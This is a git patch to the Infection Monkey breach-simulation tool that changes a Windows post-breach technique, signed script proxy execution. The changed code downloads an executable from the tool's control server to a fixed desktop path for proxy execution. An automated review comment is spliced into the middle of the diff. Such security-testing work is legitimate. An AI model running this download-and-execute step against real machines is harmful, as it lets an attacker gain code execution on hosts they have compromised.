From 79eeaa790459ff448700d442996c269ab2c57c7b Mon Sep 17 00:00:00 2001
From: Shreya
Date: Tue, 18 Aug 2020 00:22:46 +0530
Subject: [PATCH] Code review changes - smaller executable file; fetches it from the island when pba needs to run - technique configured off by default - other implementation changes
---
 .../signed_script_proxy/windows/signed_script_proxy.py | 2 ++
 monkey/monkey_island/cc/app.py | 1 -
 monkey/monkey_island/cc/resources/T1216_pba_file_download.py | 1 -
 3 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
index d4a29e844..aad179640 100644
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
@@ -1,3 +1,4 @@
+import shutil
 import subprocess
 from pathlib import Path
@@ -7,6 +8,7 @@ from infection_monkey.control import ControlClient
 def get_windows_commands_to_proxy_execution_using_signed_script():
 # temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
 # temp_comspec = Path(*temp_comspec_path)
+ temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe"
 with ControlClient.get_T1216_pba_file() as r:
 with open(temp_comspec, 'wb') as f:
 shutil.copyfileobj(r.raw, f)
diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py
index 666431798..31b534b3a 100644
--- a/monkey/monkey_island/cc/app.py
+++ b/monkey/monkey_island/cc/app.py
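Review bot: The added `temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe"` in signed_script_proxy.py hard-codes the profile path of one particular machine, so the `open(temp_comspec, 'wb')` below it fails on any host without a `win` user, and where it succeeds the executable lands at a fixed, predictable location. Deriving the path from a freshly created private directory, e.g. `temp_comspec = Path(tempfile.mkdtemp()) / "t1216.exe"` (with `import tempfile` next to the new `import shutil`), removes both the portability problem and the predictable-filename risk. The response from `ControlClient.get_T1216_pba_file()` is streamed to disk with no visible status check; its implementation is not in this diff, but if it returns a requests response, calling `r.raise_for_status()` before `shutil.copyfileobj` would keep an error body from being written out as the .exe. The function body continues outside the hunk, so whether the file is deleted after the PBA runs cannot be confirmed here and is worth verifying.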
@@ -31,7 +31,6 @@ from monkey_island.cc.resources.netmap import NetMap
 from monkey_island.cc.resources.node import Node
 from monkey_island.cc.resources.node_states import NodeStates
 from monkey_island.cc.resources.pba_file_download import PBAFileDownload
-from monkey_island.cc.resources.T1216_pba_file_download import T1216PBAFileDownload
 from monkey_island.cc.resources.pba_file_upload import FileUpload
 from monkey_island.cc.resources.remote_run import RemoteRun
 from monkey_island.cc.resources.reporting.report import Report
diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
index 11f4dd6a8..16aa43581 100644
--- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
+++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
@@ -8,7 +8,6 @@ class T1216PBAFileDownload(flask_restful.Resource): """ File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA) """ - def get(self): executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe'] executable_file = Path(*executable_file_path)